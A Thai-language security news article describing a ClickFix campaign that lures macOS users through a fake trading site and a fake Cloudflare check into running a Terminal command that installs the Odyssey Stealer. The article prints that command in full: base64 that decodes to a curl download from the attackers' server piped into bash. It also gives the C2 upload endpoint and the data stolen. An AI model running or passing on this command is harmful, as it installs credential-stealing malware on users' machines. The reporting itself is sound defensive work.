ชาว macOS ระวัง แฮกเกอร์ใช้เทคนิค ClickFix บนเว็บปลอม หลอกฝังมัลแวร์ขโมยรหัสผ่านลงเครื่อง

ในช่วงที่ผ่านมาวิธีการหลอกลวงอย่าง ClickFix หรือการหลอกลวงให้เหยื่อกระทำการตามคำสั่งบนเว็บปลอมเพื่อแก้ไขปัญหาบางอย่าง แต่แท้จริงเป็นการหลอกให้กรอกคำสั่งดาวน์โหลด และติดตั้งมัลแวร์นั้น มักเป็นที่นิยมในการโจมตีกลุ่มผู้ใช้งานระบบปฏิบัติการ Windows แต่ในเวลานี้ผู้ใช้งาน macOS ก็อาจโดนหลอกด้วยวิธีการดังกล่าวได้เช่นเดียวกัน

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญหลอกลวงเหยื่อที่ใช้งานระบบปฏิบัติการ macOS ด้วยวิธีการ ClickFix แคมเปญใหม่ที่มีจุดประสงค์ในการปล่อยมัลแวร์ประเภทขโมยข้อมูลจากเหยื่อ หรือ Infostealer ตัวใหม่ที่มีชื่อว่า Odyssey Stealer โดยมัลแวร์ดังกล่าวนั้นถูกสร้างขึ้นมาเพื่อใช้งานบนระบบ macOS โดยเฉพาะ ซึ่งการตรวจพบแคมเปญดังกล่าวนั้นเป็นผลงานของทีมวิจัยจาก Forcepoint บริษัทผู้เชี่ยวชาญด้านการจัดการความปลอดภัยของข้อมูล และระบบคลาวด์

ภาพจาก : https://cybersecuritynews.com/clickfix-malware-attacks-macos/

โดยแคมเปญดังกล่าวนั้น แฮกเกอร์จะหลอกให้เหยื่อเข้าสู่เว็บไซต์ที่อ้างตนว่าเป็นแพลตฟอร์มสำหรับการซื้อขายหุ้น (Trading) ซึ่งในที่นี้ทางทีมวิจัยไม่ได้ระบุชื่อแพลตฟอร์มที่ถูกแอบอ้างไว้ โดยหลังจากที่เหยื่อได้มีปฏิสัมพันธ์กับตัวเว็บไซต์สักพักหนึ่ง ตัวเว็บไซต์จะส่งเหยื่อไปยังหน้าที่ทำเลียนแบบบริการของ Cloudflare สำหรับในการตรวจสอบว่าผู้ใช้งานนั้นเป็นมนุษย์หรือไม่ โดยในหน้าที่เหยื่อจะถูกหลอกให้ทำตามวิธีที่อยู่บนหน้าจอเพื่อรัน AppleScript (คล้ายคลึงกับการหลอกให้เหยื่อที่ใช้งาน Windows ทำการรันสคริปท์ PowerShell) โดยเริ่มจากการหลอกให้เหยื่อทำการเปิดแอปพลิเคชัน Terminal และป้อนสคริปท์นี้ลงไปรัน ซึ่งตัวสคริปท์จะทำหน้าที่ในการถอดรหัสสคริปท์ที่ถูกเข้ารหัสอยู่ในรูปแบบ Base-64 ออกมาเป็น Bash โดยตัวสคริปท์นั้นจะเป็นไปดังนี้

echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXN0ICY="

| base64 -d | bash

โดยหลังจากที่รันคำสั่งเรียบร้อยแล้ว ก็จะนำไปสู่การติดตั้งมัลแวร์จากไฟล์ AppleScript (.scpt) ที่ภายในมีการซุกซ่อนความสามารถในการรวบรวมข้อมูลต่าง ๆ ที่อยู่บนเครื่องของเหยื่อ ซึ่งตัวไฟล์มัลแวร์ดังกล่าวนั้นจะถูกดาวน์โหลดมาจากเซิร์ฟเวอร์ (hxxp://45.146.130[.]131/d/vipx14350) ซึ่งการทำงานจะเริ่มขึ้นด้วยการที่สคริปท์ดังกล่าวจะทำการสร้างโฟลเดอร์ชั่วคราวภายใต้โฟลเดอร์ /tmp แล้วทำการเปิดใช้งาน osascript เพื่อรันคำสั่ง

osascript -e 'run script "on mkdir(item)ntrynset filePath to quoted form of (POSIX path of item)ndo shell script "mkdir -p " & filePathnend trynend mkdir"'

หลังจากการรันคำสั่งดังกล่าวเสร็จเรียบ ก็จะมีการเด้งหน้าจอหลอกให้เหยื่อใส่รหัสการใช้งานระบบ เพื่อเพิ่มสิทธิ์ในการเข้าถึงระบบให้กับมัลแวร์ หลังจากเสร็จสิ้นขั้นตอน มัลแวร์ก็จะทำการเก็บข้อมูลของระบบของเหยื่อผ่านทางคำสั่ง

system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType

หลังจากนั้นตัวมัลแวร์จะทำการสแกนเพื่อค้นหาไฟล์ที่เกี่ยวข้องกับเว็บเบราว์เซอร์และไฟล์นามสกุล .pdf, .docx, .key เป็นต้น ที่มีการเก็บไว้อยู่ในส่วนของ Desktop และ Library รวมถึงเก็บข้อมูลต่าง ๆ ที่เกี่ยวข้องกับ Profile ผู้ใช้งานบนเว็บเบราว์เซอร์ Firefox และ Chrome อย่างเช่น รหัสผ่านต่าง ๆ, ประวัติการเข้าเว็บไซต์, ไฟล์ Cookies, ไปจนถึงไฟล์เข้ารหัสของกระเป๋าเงินคริปโตเคอร์เรนซีที่ถูกผูกกับเว็บเบราว์เซอร์ โดยข้อมูลทั้งหมดจะถูกบรรจุลงในไฟล์ที่มีชื่อว่า /tmp/out.zip ซึ่งจะถูกส่งไปยังเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ในส่วนของ Endpoint (ปลายทาง) ที่แฮกเกอร์ตั้งไว้ โดยจะมีลักษณะดังนี้ 45.146.130.131/log

หลังเสร็จสิ้นขั้นตอนทั้งหมดแล้ว มัลแวร์จะทำการลบโฟลเดอร์ชั่วคราวทั้งหมดทิ้งทันที ทำให้ยากต่อการวิเคราะห์ค้นหาว่าเกิดอะไรขึ้นกับเครื่องของเหยื่อ เรียกได้ว่ามัลแวร์ตัวนี้มีความร้ายกาจและทำงานได้อย่างเงียบเชียบมาก